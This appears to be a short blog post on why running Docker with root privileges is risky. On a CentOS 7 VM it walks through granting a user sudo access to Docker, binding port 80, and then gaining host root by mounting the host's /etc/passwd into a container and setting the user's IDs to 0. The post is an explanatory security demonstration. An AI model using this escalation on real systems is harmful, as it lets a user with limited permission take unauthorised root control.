In my previous post I mentioned that I am learning about Podman, a tool for running containers that does not require a daemon process (like the Docker daemon) or root privileges.
In this post I would like to demonstrate why running containers with root privileges could be dangerous.
For my demonstration, I have a CentOS 7 host running on VirtualBox. I have installed Docker and started the Docker daemon via the following steps:
sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo sudo yum install docker-ce sudo systemctl start docker
Next, I will create a new user, Bob Billiards:
sudo useradd -u 8888 -c "Bob Billiards" bbilliar
I will let Bob run the docker command via sudo:
sudo visudo -f /etc/sudoers.d/docker
Test 1 – Confirm user is able to run Docker via sudo
[bbilliar@centos7 ~]$ sudo docker run --rm -it alpine sh / #
Bob is able to run Docker via sudo, as expected.
Test 2 – Publish a privileged port
This time, Bob is going to publish port 80, a privileged port. This may be unexpected, but Docker runs with root privileges:
[bbilliar@centos7 ~]$ sudo docker run --rm -it -p 80:80 alpine sh / #
To test that it is really bound to port 80, I started netcat listening on port 80 in the container:
/ # nc -l -p 80
Then I ran curl from the host:
[bbilliar@centos7 ~]$ curl localhost
The request headers appeared in the container, as expected:
GET / HTTP/1.1 User-Agent: curl/7.29.0 Host: localhost Accept: */*
Test 3 – Share a volume and gain root access
This time, Bob is going to share volumes between the host and the container, specifically he is going to mount the host’s
/etc/passwd file as
/etc/passwd inside the container:
[bbilliar@centos7 ~]$ sudo docker run --rm -it --volume /etc/passwd:/etc/passwd alpine sh / #
From here, edit
/etc/passwd and change user
gid to 0.
Exit the container.
View user bbilliar’s /etc/passwd entry on the host:
[bbilliar@centos7 ~]$ grep bbilliar /etc/passwd bbilliar:x:0:0::/home/bbilliar:/bin/bash
Logout, and log back in as
Using username "bbilliar". firstname.lastname@example.org's password: Last login: Mon Dec 31 13:38:57 2018 from 10.0.2.2 [root@centos7 ~]#
Bob is now root! This may not be what the administrator expected when giving Bob sudo privileges to run Docker.